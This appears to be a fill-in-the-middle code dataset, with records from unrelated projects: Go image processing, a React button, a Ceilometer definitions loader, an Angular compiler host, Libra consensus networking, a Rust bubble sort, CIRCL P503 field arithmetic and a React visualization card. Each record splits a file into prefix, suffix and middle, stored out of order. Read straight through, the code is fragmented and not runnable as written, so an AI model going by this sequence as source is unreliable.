if err = applyWatermark(img, imgData, &v.watermarkOptions, 1); err != nil {
return err
}
}
}
}
if err = img.RgbColourspace(); err != nil {
return err
}
if err := img.CastUchar(); err != nil {
return err
}
if po.StripMetadata {
if err := img.Strip(); err != nil {
return err
}
}
return copyMemoryAndCheckTimeout(ctx, img)
}
func transformAnimated(ctx context.Context, img *vipsImage, data []byte, po *processingOptions, imgtype imageType) error {
if po.Trim.Enabled {
logWarning("Trim is not supported for animated images")
po.Trim.Enabled = false
}
imgWidth := img.Width()
frameHeight, err := img.GetInt("page-height")
if err != nil {
return err
}
framesCount := minInt(img.Height()/frameHeight, conf.MaxAnimationFrames)
// Double check dimensions because animated image has many frames
if err = checkDimensions(imgWidth, frameHeight*framesCount); err != nil {
return err
}
// Vips 8.8+ supports n-pages and doesn't load the whole animated image on header access
if nPages, _ := img.GetInt("n-pages"); nPages > framesCount {
// Load only the needed frames
if err = img.Load(data, imgtype, 1, 1.0, framesCount); err != nil {
return err
}
}
delay, err := img.GetInt("gif-delay")
if err != nil {
return err
}
loop, err := img.GetInt("gif-loop")
if err != nil {
return err
}
watermarkEnabled := po.Watermark.Enabled
po.Watermark.Enabled = false
defer func() { po.Watermark.Enabled = watermarkEnabled }()
anyUrlWatermarkEnabled := false
if len(po.URLWatermarks) > 0 {
urlWatermarksEnabled := make(map[int]bool)
for k, v := range po.URLWatermarks {
if v.Enabled {
anyUrlWatermarkEnabled = true
}
urlWatermarksEnabled[k] = v.Enabled
v.Enabled = false
}
defer func() {
for k, v := range urlWatermarksEnabled {
po.URLWatermarks[k].Enabled = v
}
}()
}
frames := make([]*vipsImage, framesCount)
defer func() {
for _, frame := range frames {
if frame != nil {
frame.Clear()
}
}
}()
for i := 0; i < framesCount; i++ {
frame := new(vipsImage)
if err = img.Extract(frame, 0, i*frameHeight, imgWidth, frameHeight); err != nil {
return err
}
frames[i] = frame
if err = transformImage(ctx, frame, nil, po, imgtype); err != nil {
return err
}
if err = copyMemoryAndCheckTimeout(ctx, frame); err != nil {
return err
}
}
if err = img.Arrayjoin(frames); err != nil {
return err
}
if watermarkEnabled && watermark != nil {
if err = applyWatermark(img, watermark, &po.Watermark, framesCount); err != nil {
return err
}
framesCount++
}
if len(po.URLWatermarks) > 0 && anyUrlWatermarkEnabled {
for _, v := range po.URLWatermarks {
if v.Enabled {
var imgData *imageData
if imgData, err = remoteImageData(v.ImageURL, "url_watermark"); err != nil {
return err
}
if err = applyWatermark(img, imgData, &v.watermarkOptions, framesCount); err != nil {
return err
}
framesCount++
}
}
}
if err = img.CastUchar(); err != nil {
return err
}
if err = copyMemoryAndCheckTimeout(ctx, img); err != nil {
return err
}
img.SetInt("page-height", frames[0].Height())
img.SetInt("gif-delay", delay)
img.SetInt("gif-loop", loop)
img.SetInt("n-pages", framesCount)
return nil
}
func getIcoData(imgdata *imageData) (*imageData, error) {
icoMeta, err := imagemeta.DecodeIcoMeta(bytes.NewReader(imgdata.Data))
if err != nil {
return nil, err
}
offset := icoMeta.BestImageOffset()
size := icoMeta.BestImageSize()
data := imgdata.Data[offset : offset+size]
var format string
meta, err := imagemeta.DecodeMeta(bytes.NewReader(data))
if err != nil {
// Looks like it's BMP with an incomplete header
if d, err := imagemeta.FixBmpHeader(data); err == nil {
format = "bmp"
data = d
} else {
return nil, err
}
} else {
format = meta.Format()
}
if imgtype, ok := imageTypes[format]; ok && vipsTypeSupportLoad[imgtype] {
return &imageData{
Data: data,
Type: imgtype,
}, nil
}
return nil, fmt.Errorf("Can't load %s from ICO", meta.Format())
}
func saveImageToFitBytes(po *processingOptions, img *vipsImage) ([]byte, context.CancelFunc, error) {
var diff float64
quality := po.getQuality()
img.CopyMemory()
for {
result, cancel, err := img.Save(po.Format, quality)
if len(result) <= po.MaxBytes || quality <= 10 || err != nil {
return result, cancel, err
}
cancel()
delta := float64(len(result)) / float64(po.MaxBytes)
switch {
case delta > 3:
diff = 0.25
case delta > 1.5:
diff = 0.5
default:
diff = 0.75
}
quality = int(float64(quality) * diff)
}
}
func processImage(ctx context.Context) ([]byte, context.CancelFunc, error) {
runtime.LockOSThread()
defer runtime.UnlockOSThread()
if newRelicEnabled {
newRelicCancel := startNewRelicSegment(ctx, "Processing image")
defer newRelicCancel()
}
if prometheusEnabled {
defer startPrometheusDuration(prometheusProcessingDuration)()
}
defer vipsCleanup()
po := getProcessingOptions(ctx)
imgdata := getImageData(ctx)
switch {
case po.Format == imageTypeUnknown:
switch {
case po.PreferAvif && canSwitchFormat(imgdata.Type, imageTypeUnknown, imageTypeAVIF):
po.Format = imageTypeAVIF
case po.PreferWebP && canSwitchFormat(imgdata.Type, imageTypeUnknown, imageTypeWEBP):
po.Format = imageTypeWEBP
case imageTypeSaveSupport(imgdata.Type) && imageTypeGoodForWeb(imgdata.Type):
po.Format = imgdata.Type
default:
po.Format = imageTypeJPEG
}
case po.EnforceAvif && canSwitchFormat(imgdata.Type, po.Format, imageTypeAVIF):
po.Format = imageTypeAVIF
case po.EnforceWebP && canSwitchFormat(imgdata.Type, po.Format, imageTypeWEBP):
po.Format = imageTypeWEBP
}
if po.Format == imageTypeSVG {
if imgdata.Type != imageTypeSVG {
return []byte{}, func() {}, errConvertingNonSvgToSvg
}
return imgdata.Data, func() {}, nil
}
if imgdata.Type == imageTypeSVG && !vipsTypeSupportLoad[imageTypeSVG] {
return []byte{}, func() {}, errSourceImageTypeNotSupported
}
if imgdata.Type == imageTypeICO {
icodata, err := getIcoData(imgdata)
if err != nil {
return nil, func() {}, err
}
imgdata = icodata
}
if !vipsSupportSmartcrop {
if po.Gravity.Type == gravitySmart {
logWarning(msgSmartCropNotSupported)
po.Gravity.Type = gravityCenter
}
if po.Crop.Gravity.Type == gravitySmart {
logWarning(msgSmartCropNotSupported)
po.Crop.Gravity.Type = gravityCenter
}
}
if po.ResizingType == resizeCrop {
logWarning("`crop` resizing type is deprecated and will be removed in future versions. Use `crop` processing option instead")
po.Crop.Width, po.Crop.Height = float64(po.Width), float64(po.Height)
po.ResizingType = resizeFit
po.Width, po.Height = 0, 0
}
animationSupport := conf.MaxAnimationFrames > 1 && vipsSupportAnimation(imgdata.Type) && vipsSupportAnimation(po.Format)
pages := 1
if animationSupport {
pages = -1
}
img := new(vipsImage)
defer img.Clear()
if err := img.Load(imgdata.Data, imgdata.Type, 1, 1.0, pages); err != nil {
return nil, func() {}, err
}
if animationSupport && img.IsAnimated() {
if err := transformAnimated(ctx, img, imgdata.Data, po, imgdata.Type); err != nil {
return nil, func() {}, err
}
} else {
if err := transformImage(ctx, img, imgdata.Data, po, imgdata.Type); err != nil {
return nil, func() {}, err
}
}
if err := copyMemoryAndCheckTimeout(ctx, img); err != nil {
return nil, func() {}, err
}
if po.MaxBytes > 0 && canFitToBytes(po.Format) {
return saveImageToFitBytes(po, img)
}
po.Width, po.Height = img.Height(), img.Width()
return img.Save(po.Format, po.getQuality())
}
| {
switch {
case crop == 0.0:
return 0
case crop >= 1.0:
return int(crop)
default:
return maxInt(1, scaleInt(orig, crop))
}
} |
MoreButton.tsx | import React from "react";
import SpriteIcon from "../SpriteIcon";
interface MoreButtonProps { | }
const MoreButton: React.FC<MoreButtonProps> = (props) => {
return (
<div className="header-btn more-button svgOnHover" onClick={props.onClick}>
<SpriteIcon name="more" className="active" />
</div>
);
};
export default MoreButton; | onClick(): void; |
declarative.py | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from jsonpath_rw_ext import parser
from oslo_log import log
import six
import yaml
from ceilometer.i18n import _
LOG = log.getLogger(__name__)
class DefinitionException(Exception):
def __init__(self, message, definition_cfg):
msg = '%s %s: %s' % (self.__class__.__name__, definition_cfg, message)
super(DefinitionException, self).__init__(msg)
self.brief_message = message
class MeterDefinitionException(DefinitionException):
pass
class EventDefinitionException(DefinitionException):
pass
class ResourceDefinitionException(DefinitionException):
pass
class Definition(object):
JSONPATH_RW_PARSER = parser.ExtentedJsonPathParser()
GETTERS_CACHE = {}
def __init__(self, name, cfg, plugin_manager):
self.cfg = cfg
self.name = name
self.plugin = None
if isinstance(cfg, dict):
if 'fields' not in cfg:
raise DefinitionException(
_("The field 'fields' is required for %s") % name,
self.cfg)
if 'plugin' in cfg:
plugin_cfg = cfg['plugin']
if isinstance(plugin_cfg, six.string_types):
plugin_name = plugin_cfg
plugin_params = {}
else:
try:
plugin_name = plugin_cfg['name']
except KeyError:
raise DefinitionException(
_('Plugin specified, but no plugin name supplied '
'for %s') % name, self.cfg)
plugin_params = plugin_cfg.get('parameters')
if plugin_params is None:
plugin_params = {}
try:
plugin_ext = plugin_manager[plugin_name]
except KeyError:
raise DefinitionException(
_('No plugin named %(plugin)s available for '
'%(name)s') % dict(
plugin=plugin_name,
name=name), self.cfg)
plugin_class = plugin_ext.plugin
self.plugin = plugin_class(**plugin_params)
fields = cfg['fields']
else:
# Simple definition "foobar: jsonpath"
fields = cfg
if isinstance(fields, list):
# NOTE(mdragon): if not a string, we assume a list.
if len(fields) == 1:
fields = fields[0]
else:
fields = '|'.join('(%s)' % path for path in fields)
if isinstance(fields, six.integer_types):
self.getter = fields
else:
try:
self.getter = self.make_getter(fields)
except Exception as e:
raise DefinitionException(
_("Parse error in JSONPath specification "
"'%(jsonpath)s' for %(name)s: %(err)s")
% dict(jsonpath=fields, name=name, err=e), self.cfg)
def _get_path(self, match):
|
def parse(self, obj, return_all_values=False):
if callable(self.getter):
values = self.getter(obj)
else:
return self.getter
values = [match for match in values
if return_all_values or match.value is not None]
if self.plugin is not None:
if return_all_values and not self.plugin.support_return_all_values:
raise DefinitionException("Plugin %s don't allows to "
"return multiple values" %
self.cfg["plugin"]["name"], self.cfg)
values_map = [('.'.join(self._get_path(match)), match.value) for
match in values]
values = [v for v in self.plugin.trait_values(values_map)
if v is not None]
else:
values = [match.value for match in values if match is not None]
if return_all_values:
return values
else:
return values[0] if values else None
def make_getter(self, fields):
if fields in self.GETTERS_CACHE:
return self.GETTERS_CACHE[fields]
else:
getter = self.JSONPATH_RW_PARSER.parse(fields).find
self.GETTERS_CACHE[fields] = getter
return getter
def load_definitions(conf, defaults, config_file, fallback_file=None):
"""Setup a definitions from yaml config file."""
if not os.path.exists(config_file):
config_file = conf.find_file(config_file)
if not config_file and fallback_file is not None:
LOG.debug("No Definitions configuration file found! "
"Using default config.")
config_file = fallback_file
if config_file is not None:
LOG.debug("Loading definitions configuration file: %s", config_file)
with open(config_file) as cf:
config = cf.read()
try:
definition_cfg = yaml.safe_load(config)
except yaml.YAMLError as err:
if hasattr(err, 'problem_mark'):
mark = err.problem_mark
errmsg = (_("Invalid YAML syntax in Definitions file "
"%(file)s at line: %(line)s, column: %(column)s.")
% dict(file=config_file,
line=mark.line + 1,
column=mark.column + 1))
else:
errmsg = (_("YAML error reading Definitions file "
"%(file)s")
% dict(file=config_file))
LOG.error(errmsg)
raise
else:
LOG.debug("No Definitions configuration file found! "
"Using default config.")
definition_cfg = defaults
LOG.debug("Definitions: %s", definition_cfg)
return definition_cfg
| if match.context is not None:
for path_element in self._get_path(match.context):
yield path_element
yield str(match.path) |
compiler_host.ts | /**
* @license
* Copyright Google LLC All Rights Reserved.
*
* Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.io/license
*/
import ts from 'typescript';
import {CompilerHost, CompilerOptions} from './api';
let wrapHostForTest: ((host: ts.CompilerHost) => ts.CompilerHost)|null = null;
export function | (wrapFn: ((host: ts.CompilerHost) => ts.CompilerHost)|
null): void {
wrapHostForTest = wrapFn;
}
export function createCompilerHost(
{options, tsHost = ts.createCompilerHost(options, true)}:
{options: CompilerOptions, tsHost?: ts.CompilerHost}): CompilerHost {
if (wrapHostForTest !== null) {
tsHost = wrapHostForTest(tsHost);
}
return tsHost;
}
| setWrapHostForTest |
network.rs | // Copyright (c) The Libra Core Contributors
// SPDX-License-Identifier: Apache-2.0
use crate::{
counters,
network_interface::{ConsensusMsg, ConsensusNetworkEvents, ConsensusNetworkSender},
};
use anyhow::{anyhow, ensure};
use bytes::Bytes;
use channel::{self, libra_channel, message_queues::QueueStyle};
use consensus_types::{
block_retrieval::{BlockRetrievalRequest, BlockRetrievalResponse},
common::Author,
proposal_msg::ProposalMsg,
sync_info::SyncInfo,
vote_msg::VoteMsg,
};
use futures::{channel::oneshot, stream::select, SinkExt, Stream, StreamExt, TryStreamExt};
use libra_logger::prelude::*;
use libra_metrics::monitor;
use libra_security_logger::{security_log, SecurityEvent};
use libra_types::{
account_address::AccountAddress, epoch_change::EpochChangeProof,
validator_verifier::ValidatorVerifier,
};
use network::protocols::{network::Event, rpc::error::RpcError};
use std::{
mem::{discriminant, Discriminant},
num::NonZeroUsize,
time::Duration,
};
/// The block retrieval request is used internally for implementing RPC: the callback is executed
/// for carrying the response
#[derive(Debug)]
pub struct IncomingBlockRetrievalRequest {
pub req: BlockRetrievalRequest,
pub response_sender: oneshot::Sender<Result<Bytes, RpcError>>,
}
/// Just a convenience struct to keep all the network proxy receiving queues in one place.
/// Will be returned by the NetworkTask upon startup.
pub struct NetworkReceivers {
/// Provide a LIFO buffer for each (Author, MessageType) key
pub consensus_messages: libra_channel::Receiver<
(AccountAddress, Discriminant<ConsensusMsg>),
(AccountAddress, ConsensusMsg),
>,
pub block_retrieval: libra_channel::Receiver<AccountAddress, IncomingBlockRetrievalRequest>,
}
/// Implements the actual networking support for all consensus messaging.
#[derive(Clone)]
pub struct NetworkSender {
author: Author,
network_sender: ConsensusNetworkSender,
// Self sender and self receivers provide a shortcut for sending the messages to itself.
// (self sending is not supported by the networking API).
// Note that we do not support self rpc requests as it might cause infinite recursive calls.
self_sender: channel::Sender<anyhow::Result<Event<ConsensusMsg>>>,
validators: ValidatorVerifier,
}
impl NetworkSender {
pub fn new(
author: Author,
network_sender: ConsensusNetworkSender,
self_sender: channel::Sender<anyhow::Result<Event<ConsensusMsg>>>,
validators: ValidatorVerifier,
) -> Self {
NetworkSender {
author,
network_sender,
self_sender,
validators,
}
}
/// Tries to retrieve num of blocks backwards starting from id from the given peer: the function
/// returns a future that is fulfilled with BlockRetrievalResponse.
pub async fn request_block(
&mut self,
retrieval_request: BlockRetrievalRequest,
from: Author,
timeout: Duration,
) -> anyhow::Result<BlockRetrievalResponse> {
ensure!(from != self.author, "Retrieve block from self");
let msg = ConsensusMsg::BlockRetrievalRequest(Box::new(retrieval_request.clone()));
let response_msg = monitor!(
"block_retrieval",
self.network_sender.send_rpc(from, msg, timeout).await?
);
let response = match response_msg {
ConsensusMsg::BlockRetrievalResponse(resp) => *resp,
_ => return Err(anyhow!("Invalid response to request")),
};
response
.verify(
retrieval_request.block_id(),
retrieval_request.num_blocks(),
&self.validators,
)
.map_err(|e| {
security_log(SecurityEvent::InvalidRetrievedBlock)
.error(&e)
.data(&response)
.log();
e
})?;
Ok(response)
}
/// Tries to send the given proposal (block and proposer metadata) to all the participants.
/// A validator on the receiving end is going to be notified about a new proposal in the
/// proposal queue.
///
/// The future is fulfilled as soon as the message put into the mpsc channel to network
/// internal(to provide back pressure), it does not indicate the message is delivered or sent
/// out. It does not give indication about when the message is delivered to the recipients,
/// as well as there is no indication about the network failures.
pub async fn broadcast_proposal(&mut self, proposal: ProposalMsg) {
let msg = ConsensusMsg::ProposalMsg(Box::new(proposal));
// counters::UNWRAPPED_PROPOSAL_SIZE_BYTES.observe(msg.message.len() as f64);
self.broadcast(msg).await
}
async fn broadcast(&mut self, msg: ConsensusMsg) {
// Directly send the message to ourself without going through network.
let self_msg = Event::Message((self.author, msg.clone()));
if let Err(err) = self.self_sender.send(Ok(self_msg)).await {
error!("Error broadcasting to self: {:?}", err);
}
// Get the list of validators excluding our own account address. Note the
// ordering is not important in this case.
let self_author = self.author;
let other_validators = self
.validators
.get_ordered_account_addresses_iter()
.filter(|author| author != &self_author);
// Broadcast message over direct-send to all other validators.
if let Err(err) = self.network_sender.send_to_many(other_validators, msg) {
error!("Error broadcasting message: {:?}", err);
}
}
/// Sends the vote to the chosen recipients (typically that would be the recipients that
/// we believe could serve as proposers in the next round). The recipients on the receiving
/// end are going to be notified about a new vote in the vote queue.
///
/// The future is fulfilled as soon as the message put into the mpsc channel to network
/// internal(to provide back pressure), it does not indicate the message is delivered or sent
/// out. It does not give indication about when the message is delivered to the recipients,
/// as well as there is no indication about the network failures.
pub async fn send_vote(&self, vote_msg: VoteMsg, recipients: Vec<Author>) {
let mut network_sender = self.network_sender.clone();
let mut self_sender = self.self_sender.clone();
let msg = ConsensusMsg::VoteMsg(Box::new(vote_msg));
for peer in recipients {
if self.author == peer {
let self_msg = Event::Message((self.author, msg.clone()));
if let Err(err) = self_sender.send(Ok(self_msg)).await {
error!("Error delivering a self vote: {:?}", err);
}
continue;
}
if let Err(e) = network_sender.send_to(peer, msg.clone()) {
error!("Failed to send a vote to peer {:?}: {:?}", peer, e);
}
}
}
/// Broadcasts vote message to all validators
pub async fn broadcast_vote(&mut self, vote_msg: VoteMsg) {
let msg = ConsensusMsg::VoteMsg(Box::new(vote_msg));
self.broadcast(msg).await
}
/// Sends the given sync info to the given author.
/// The future is fulfilled as soon as the message is added to the internal network channel
/// (does not indicate whether the message is delivered or sent out).
pub fn send_sync_info(&self, sync_info: SyncInfo, recipient: Author) {
let msg = ConsensusMsg::SyncInfo(Box::new(sync_info));
let mut network_sender = self.network_sender.clone();
if let Err(e) = network_sender.send_to(recipient, msg) {
warn!(
"Failed to send a sync info msg to peer {:?}: {:?}",
recipient, e
);
}
}
/// Broadcast about epoch changes with proof to the current validator set (including self)
/// when we commit the reconfiguration block
pub async fn broadcast_epoch_change(&mut self, proof: EpochChangeProof) {
let msg = ConsensusMsg::EpochChangeProof(Box::new(proof));
self.broadcast(msg).await
}
pub async fn notify_epoch_change(&mut self, proof: EpochChangeProof) {
let msg = ConsensusMsg::EpochChangeProof(Box::new(proof));
let self_msg = Event::Message((self.author, msg));
if let Err(e) = self.self_sender.send(Ok(self_msg)).await {
warn!("Failed to notify to self an epoch change {:?}", e);
}
}
}
pub struct NetworkTask {
consensus_messages_tx: libra_channel::Sender<
(AccountAddress, Discriminant<ConsensusMsg>),
(AccountAddress, ConsensusMsg),
>,
block_retrieval_tx: libra_channel::Sender<AccountAddress, IncomingBlockRetrievalRequest>,
all_events: Box<dyn Stream<Item = anyhow::Result<Event<ConsensusMsg>>> + Send + Unpin>,
}
impl NetworkTask {
/// Establishes the initial connections with the peers and returns the receivers.
pub fn new(
network_events: ConsensusNetworkEvents,
self_receiver: channel::Receiver<anyhow::Result<Event<ConsensusMsg>>>,
) -> (NetworkTask, NetworkReceivers) {
let (consensus_messages_tx, consensus_messages) = libra_channel::new(
QueueStyle::LIFO,
NonZeroUsize::new(1).unwrap(),
Some(&counters::CONSENSUS_CHANNEL_MSGS),
);
let (block_retrieval_tx, block_retrieval) = libra_channel::new(
QueueStyle::LIFO,
NonZeroUsize::new(1).unwrap(),
Some(&counters::BLOCK_RETRIEVAL_CHANNEL_MSGS),
);
let network_events = network_events.map_err(Into::<anyhow::Error>::into);
let all_events = Box::new(select(network_events, self_receiver));
(
NetworkTask {
consensus_messages_tx, | NetworkReceivers {
consensus_messages,
block_retrieval,
},
)
}
pub async fn start(mut self) {
while let Some(Ok(message)) = self.all_events.next().await {
match message {
Event::Message((peer_id, msg)) => {
if let Err(e) = self
.consensus_messages_tx
.push((peer_id, discriminant(&msg)), (peer_id, msg))
{
warn!(
"Error pushing consensus msg from {}, error: {:?}",
peer_id, e
);
}
}
Event::RpcRequest((peer_id, msg, callback)) => match msg {
ConsensusMsg::BlockRetrievalRequest(request) => {
debug!("Received block retrieval request {}", request);
let req_with_callback = IncomingBlockRetrievalRequest {
req: *request,
response_sender: callback,
};
if let Err(e) = self.block_retrieval_tx.push(peer_id, req_with_callback) {
warn!("libra channel closed: {:?}", e);
}
}
_ => {
warn!("Unexpected msg from {}: {:?}", peer_id, msg);
continue;
}
},
Event::NewPeer(peer_id) => {
debug!("Peer {} connected", peer_id);
}
Event::LostPeer(peer_id) => {
debug!("Peer {} disconnected", peer_id);
}
}
}
}
} | block_retrieval_tx,
all_events,
}, |
bubble.rs | //! 冒泡排序(Bubble Sort)
//!
//! 它重复地走访过要排序的元素列,依次比较两个相邻的元素,如果顺
//! 序(如从大到小、首字母从Z到A)错误就把他们交换过来。走访元素
//! 的工作是重复地进行直到没有相邻元素需要交换,也就是说该元素列
//! 已经排序完成。
//!
//! 这个算法的名字由来是因为越小的元素会经由交换慢慢“浮”到数列的
//! 顶端(升序或降序排列),就如同碳酸饮料中二氧化碳的气泡最终会
//! 上浮到顶端一样,故名“冒泡排序”。
//!
use std::fmt::Debug;
pub fn sort<T>(a: &mut [T])
where
T: Ord + Debug,
{
let len = a.len();
for i in 0..len.saturating_sub(1) {
let mut swapped = false;
for j in 0..(len - 1 - i) {
if a[j] > a[j + 1] {
a.swap(j, j + 1);
swapped = true;
}
}
| if !swapped {
break;
}
}
} | println!("a: {:?}", a);
|
arith_generic.go | // Code generated by go generate; DO NOT EDIT.
// This file was generated by robots.
//go:build noasm || (!amd64 && !arm64)
// +build noasm !amd64,!arm64
package p503
import (
"math/bits"
"github.com/cloudflare/circl/dh/sidh/internal/common"
)
// Compute z = x + y (mod p).
func | (z, x, y *common.Fp) {
var carry uint64
// z=x+y % P503
for i := 0; i < FpWords; i++ {
z[i], carry = bits.Add64(x[i], y[i], carry)
}
// z = z - P503x2
carry = 0
for i := 0; i < FpWords; i++ {
z[i], carry = bits.Sub64(z[i], P503x2[i], carry)
}
// if z<0 add P503x2 back
mask := uint64(0 - carry)
carry = 0
for i := 0; i < FpWords; i++ {
z[i], carry = bits.Add64(z[i], P503x2[i]&mask, carry)
}
}
// Compute z = x - y (mod p).
func subP503(z, x, y *common.Fp) {
var borrow uint64
for i := 0; i < FpWords; i++ {
z[i], borrow = bits.Sub64(x[i], y[i], borrow)
}
mask := uint64(0 - borrow)
borrow = 0
for i := 0; i < FpWords; i++ {
z[i], borrow = bits.Add64(z[i], P503x2[i]&mask, borrow)
}
}
// If choice = 0, leave x unchanged. If choice = 1, sets x to y.
// If choice is neither 0 nor 1 then behaviour is undefined.
// This function executes in constant time.
func cmovP503(x, y *common.Fp, choice uint8) {
mask := 0 - uint64(choice)
for i := 0; i < FpWords; i++ {
x[i] ^= mask & (x[i] ^ y[i])
}
}
// Conditionally swaps bits in x and y in constant time.
// mask indicates bits to be swapped (set bits are swapped)
// For details see "Hackers Delight, 2.20"
//
// Implementation doesn't actually depend on a prime field.
func cswapP503(x, y *common.Fp, mask uint8) {
var tmp, mask64 uint64
mask64 = 0 - uint64(mask)
for i := 0; i < FpWords; i++ {
tmp = mask64 & (x[i] ^ y[i])
x[i] = tmp ^ x[i]
y[i] = tmp ^ y[i]
}
}
// Perform Montgomery reduction: set z = x R^{-1} (mod 2*p)
// with R=2^(FpWords*64). Destroys the input value.
func rdcP503(z *common.Fp, x *common.FpX2) {
var carry, t, u, v uint64
var hi, lo uint64
var count int
count = P503p1Zeros
for i := 0; i < FpWords; i++ {
for j := 0; j < i; j++ {
if j < (i - count + 1) {
hi, lo = bits.Mul64(z[j], P503p1[i-j])
v, carry = bits.Add64(lo, v, 0)
u, carry = bits.Add64(hi, u, carry)
t += carry
}
}
v, carry = bits.Add64(v, x[i], 0)
u, carry = bits.Add64(u, 0, carry)
t += carry
z[i] = v
v = u
u = t
t = 0
}
for i := FpWords; i < 2*FpWords-1; i++ {
if count > 0 {
count--
}
for j := i - FpWords + 1; j < FpWords; j++ {
if j < (FpWords - count) {
hi, lo = bits.Mul64(z[j], P503p1[i-j])
v, carry = bits.Add64(lo, v, 0)
u, carry = bits.Add64(hi, u, carry)
t += carry
}
}
v, carry = bits.Add64(v, x[i], 0)
u, carry = bits.Add64(u, 0, carry)
t += carry
z[i-FpWords] = v
v = u
u = t
t = 0
}
v, _ = bits.Add64(v, x[2*FpWords-1], 0)
z[FpWords-1] = v
}
// Compute z = x * y.
func mulP503(z *common.FpX2, x, y *common.Fp) {
var u, v, t uint64
var hi, lo uint64
var carry uint64
for i := uint64(0); i < FpWords; i++ {
for j := uint64(0); j <= i; j++ {
hi, lo = bits.Mul64(x[j], y[i-j])
v, carry = bits.Add64(lo, v, 0)
u, carry = bits.Add64(hi, u, carry)
t += carry
}
z[i] = v
v = u
u = t
t = 0
}
for i := FpWords; i < (2*FpWords)-1; i++ {
for j := i - FpWords + 1; j < FpWords; j++ {
hi, lo = bits.Mul64(x[j], y[i-j])
v, carry = bits.Add64(lo, v, 0)
u, carry = bits.Add64(hi, u, carry)
t += carry
}
z[i] = v
v = u
u = t
t = 0
}
z[2*FpWords-1] = v
}
// Compute z = x + y, without reducing mod p.
func adlP503(z, x, y *common.FpX2) {
var carry uint64
for i := 0; i < 2*FpWords; i++ {
z[i], carry = bits.Add64(x[i], y[i], carry)
}
}
// Reduce a field element in [0, 2*p) to one in [0,p).
func modP503(x *common.Fp) {
var borrow, mask uint64
for i := 0; i < FpWords; i++ {
x[i], borrow = bits.Sub64(x[i], P503[i], borrow)
}
// Sets all bits if borrow = 1
mask = 0 - borrow
borrow = 0
for i := 0; i < FpWords; i++ {
x[i], borrow = bits.Add64(x[i], P503[i]&mask, borrow)
}
}
// Compute z = x - y, without reducing mod p.
func sulP503(z, x, y *common.FpX2) {
var borrow, mask uint64
for i := 0; i < 2*FpWords; i++ {
z[i], borrow = bits.Sub64(x[i], y[i], borrow)
}
// Sets all bits if borrow = 1
mask = 0 - borrow
borrow = 0
for i := FpWords; i < 2*FpWords; i++ {
z[i], borrow = bits.Add64(z[i], P503[i-FpWords]&mask, borrow)
}
}
| addP503 |
SingleVisualizationComponent.js | import { useState, useEffect } from 'react';
import { Badge } from 'reactstrap';
import { Chart } from 'react-google-charts';
import { FontAwesomeIcon as Icon } from '@fortawesome/react-fontawesome';
import { faCalendar, faUser, faLink } from '@fortawesome/free-solid-svg-icons';
import SelfVisDataModel from 'libs/selfVisModel/SelfVisDataModel';
import moment from 'moment';
import Tippy from '@tippyjs/react';
import { RESOURCE_TYPE_ID } from 'constants/misc';
import ROUTES from 'constants/routes.js';
import { Link } from 'react-router-dom';
import { reverse } from 'named-urls';
import styled from 'styled-components';
import PropTypes from 'prop-types';
const VisualizationCard = styled.div`
margin: 0 2px;
cursor: pointer;
border: ${props => (!props.isHovered ? '1px solid rgb(219,221,229)' : '1px solid #e8616169')};
border-radius: 5px;
width: 220px;
`;
const DescriptionHeader = styled.div`
color: white;
background: ${props => props.theme.primary};
padding: 5px;
text-overflow: ellipsis;
&::selection,
&::-moz-selection {
color: ${props => props.theme.secondary};
background: ${props => props.theme.light} !important;
}
`;
const SingleVisualizationComponent = props => {
const getAvailableWidth = () => {
const item = document.getElementById('PreviewCarouselContainer');
return item?.clientWidth;
};
// get window dimensions to set the fullWidget into the center of the screen.
const width = getAvailableWidth();
const [isHovering, setIsHovering] = useState(false);
const [renderingData, setRenderingData] = useState(undefined);
const [windowHeight, setWindowHeight] = useState(0.5 * window.innerHeight);
const [windowWidth, setWindowWidth] = useState(0.8 * width);
const [selfVisModel] = useState(new SelfVisDataModel());
/** hover over a preview card handler -- currently disabled **/
const handleMouseEnter = () => {
// get window dimensions to set the fullWidget into the center of the screen.
const width = getAvailableWidth();
setIsHovering(true);
setWindowHeight(0.4 * window.innerHeight);
setWindowWidth(0.8 * width);
};
const handleMouseLeave = () => {
setIsHovering(false);
};
const visMethod = props.input.reconstructionModel.data.visMethod;
const customizationState = props.input.reconstructionModel.data.reconstructionData.customizationState;
useEffect(() => {
// we need to check if the data input for this component has changed iff then apply reconstructionModel)
const renderingData = selfVisModel.applyReconstructionModel(props.input.reconstructionModel);
setRenderingData(renderingData);
// eslint-disable-next-line react-hooks/exhaustive-deps
}, [props.input.reconstructionModel.orkgOrigin]);
return (
<Tippy
onShow={handleMouseEnter}
onHide={handleMouseLeave}
interactive={true}
placement="bottom"
theme="visualizationPreview"
maxWidth={windowWidth}
content={
<div
index={props.itemIndex}
style={{
overflow: 'hidden',
borderRadius: '4px',
width: windowWidth + 'px'
// height: windowHeight + 100 + 'px'
}}
>
<DescriptionHeader>
{props.input.label.length > 0 ? 'Title: ' + props.input.label : 'No Title'}
<Tippy content="Go to resource page">
<Link target="_blank" className="ml-2 resourceLink" to={reverse(ROUTES.RESOURCE, { id: props.input.id })}>
<Icon icon={faLink} color="#fff" />
</Link>
</Tippy>
</DescriptionHeader>
{isHovering && (
<Chart
chartType={visMethod}
data={renderingData}
width={windowWidth - 20 + 'px'}
height={windowHeight - 50 + 'px'}
options={{
showRowNumber: true,
width: '100%',
hAxis: {
title: visMethod === 'BarChart' ? customizationState.yAxisLabel : customizationState.xAxisLabel
},
vAxis: {
title: visMethod === 'BarChart' ? customizationState.xAxisLabel : customizationState.yAxisLabel
}
}}
/>
)}
<hr className="m-1" />
<div className="d-flex">
<div className="col-6 p-2 mb-2" style={{ borderRight: '2px solid #ddd' }}>
<b>Description:</b> <br /> <span>{props.input.description ? props.input.description : 'No Description'}</span>{' '}
</div>
<div className="col-6 p-2 mb-2">
<b>Meta Information:</b> <br />
<div className="mb-2">
<i>Created on: </i>
<span className="badge badge-light mr-2">
<Icon icon={faCalendar} className="text-primary" />{' '}
{props.input.created_at ? moment(props.input.created_at).format('dddd, MMMM Do YYYY') : ''}
</span> | <i>Created by: </i>
{props.input.authors.map(author => {
if (author && author.class === RESOURCE_TYPE_ID) {
return (
<Link
